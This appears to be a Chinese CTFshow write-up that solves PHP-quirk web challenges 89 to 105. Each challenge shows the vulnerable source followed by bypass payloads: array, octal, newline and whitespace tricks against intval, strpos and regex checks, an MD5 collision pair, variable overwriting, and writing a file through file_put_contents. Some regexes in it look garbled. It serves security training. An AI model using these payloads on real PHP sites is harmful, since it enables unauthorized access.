CTFshow web入门 (php特性)
<h2 id="web-89">web 89</h2><pre><code class="language-php"><?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if(preg_match("//", $num)){
die("no no no!");
}
if(intval($num)){
echo $flag;
}
}
</code></pre>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011145924146-225894892.png" alt="" loading="lazy"></p>
<p>构造数组绕过即可</p>
<p>payload:?mun[]=1</p>
<h2 id="web-90">web 90</h2>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011151456068-1756074675.png" alt="" loading="lazy"></p>
<h2 id="web-91">web 91</h2>
<pre><code class="language-php"><?php
show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
if(preg_match('/^php$/i', $a)){
echo 'hacker';
}
else{
echo $flag;
}
}
else{
echo 'nonononono';
}
</code></pre>
<pre><code>/i表示匹配的时候不区分大小写
/m 表示多行匹配,什么是多行匹配呢?就是匹配换行符两端的潜在匹配。影响正则中的^$符号
</code></pre>
<p>这里主要的突破点就是/m,我们可以看到第一个preg_match()函数,有个/m,而第二个正则则没有,我们可以利用换行进行绕过</p>
<p>payload:?cmd=%0aphp</p>
<p>注:%0a是换行的意思</p>
<h2 id="web-92">web 92</h2>
<p>和web90是一样的</p>
<p>payload:?num=0x117c</p>
<h2 id="web-93">web 93</h2>
<pre><code class="language-php"><?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==4476){
die("no no no!");
}
if(preg_match("//i", $num)){
die("no no no!");
}
if(intval($num,0)==4476){
echo $flag;
}else{
echo intval($num,0);
}
}
</code></pre>
<p>过滤了字母,十六进制弄不了,那就改八进制</p>
<p>payload:?num=010574</p>
<p>4476的八进制为10574</p>
<h2 id="web-94">web 94</h2>
<pre><code class="language-php"><?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==="4476"){
die("no no no!");
}
if(preg_match("//i", $num)){
die("no no no!");
}
if(!strpos($num, "0")){
die("no no no!");
}
if(intval($num,0)===4476){
echo $flag;
}
}
</code></pre>
<p><strong>strpos()</strong></p>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011152911526-1511795862.png" alt="" loading="lazy"></p>
<p>对于strpos()函数,我们可以利用换行进行绕过(%0a)</p>
<p>payload:?num=%0a010574</p>
<p>也可以小数点绕过</p>
<p>payload:?num=4476.0</p>
<p>因为intval()函数只读取整数部分</p>
<p>还可以八进制绕过(%20是空格的url编码形式)</p>
<p>payload:?num=%20010576</p>
<h2 id="web-95">web 95</h2>
<pre><code class="language-php"><?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==4476){
die("no no no!");
}
if(preg_match("/|\./i", $num)){
die("no no no!!");
}
if(!strpos($num, "0")){
die("no no no!!!");
}
if(intval($num,0)===4476){
echo $flag;
}
}
</code></pre>
<p>八进制绕过</p>
<p>payload:?num=%20010576</p>
<p>Payload: ?num=+010574</p>
<h2 id="web-96">web 96</h2>
<pre><code class="language-php"><?php
highlight_file(__FILE__);
if(isset($_GET['u'])){
if($_GET['u']=='flag.php'){
die("no no no");
}else{
highlight_file($_GET['u']);
}
}
</code></pre>
<p>paylaod:?u=./flag.php</p>
<p>意思就是说显示当前目录下的flag.php文件</p>
<h2 id="web-97">web 97</h2>
<pre><code class="language-php"><?php
include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>
</code></pre>
<p>md5碰撞</p>
<p>payload: a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2</p>
<p>payload:a[]=1&b[]=1</p>
<h2 id="web-98">web 98</h2>
<pre><code class="language-php"><?php
include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
?>
</code></pre>
<p>稀里糊涂的就出flag了,讲下大概思路</p>
<p>主要是三元运算符和变量覆盖</p>
<p>$_GET?$_GET=&$_POST:'flag'; 意思就是说如果存在GET请求,则将POAT请求覆盖掉GET请求</p>
<p>highlight_file($_GET['HTTP_FLAG']=='flag'?$flag: __FILE __); 意思就是说GET传参HTTP_FLAG的值为flag,则读取flag?</p>
<p>所以我就构造了GET:?flag=123</p>
<p>POST:HTTP_FLAG=flag</p>
<p>然后就得到了flag</p>
<h2 id="web-99">web 99</h2>
<pre><code class="language-php"><?php
highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) {
array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
file_put_contents($_GET['n'], $_POST['content']);
}
?>
</code></pre>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011170214587-1349496403.png" alt="" loading="lazy"></p>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011170218723-337399830.png" alt="" loading="lazy"></p>
<p>之后在cat flag36d.php即可</p>
<h2 id="web-100">web 100</h2>
<h2 id="web-104">web 104</h2>
<pre><code class="language-php"><?php
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['v1']) && isset($_GET['v2'])){
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
if(sha1($v1)==sha1($v2)){
echo $flag;
}
}
?>
</code></pre>
<p>类似md5碰撞</p>
<p>payload:</p>
<p>GET:v2=1</p>
<p>POST: v1[]=2</p>
<h2 id="web-105">web 105</h2>
<pre><code class="language-php"><?php
highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
if($key==='error'){
die("what are you doing?!");
}
$$key=$$value;
}foreach($_POST as $key => $value){
if($value==='flag'){
die("what are you doing?!");
}
$$key=$$value;
}
if(!($_POST['flag']==$flag)){
die($error);
}
echo "your are good".$flag."\n";
die($suces);
?>
</code></pre>
<p>先放payload:</p>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011175122661-1805967714.png" alt="" loading="lazy"></p>
<pre><code>foreach($_GET as $key => $value){
if($key==='error'){
die("what are you doing?!");
}
$$key=$$value;
//这是一步变量覆盖,我们传入suces=flag,最终会得到
//$suces=$flag,就是说将flag赋值给了suces变量
</code></pre>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011175841352-765546649.png" alt="" loading="lazy"></p>
<p>我们可以看到在只有GET请求的时候,报的是error错误,这也就说明我们只要将flag赋值给error变量即可</p>
<pre><code>foreach($_POST as $key => $value){
if($value==='flag'){
die("what are you doing?!");
}
$$key=$$value;
}
//我们POST传入error=suces,最终得到$error=$suces,结合GET请求,推出$error=$flag,即成功将flag的值赋值给了error变量
</code></pre><br><br>
来源:https://www.cnblogs.com/NPFS/p/13798533.html
頁:
[1]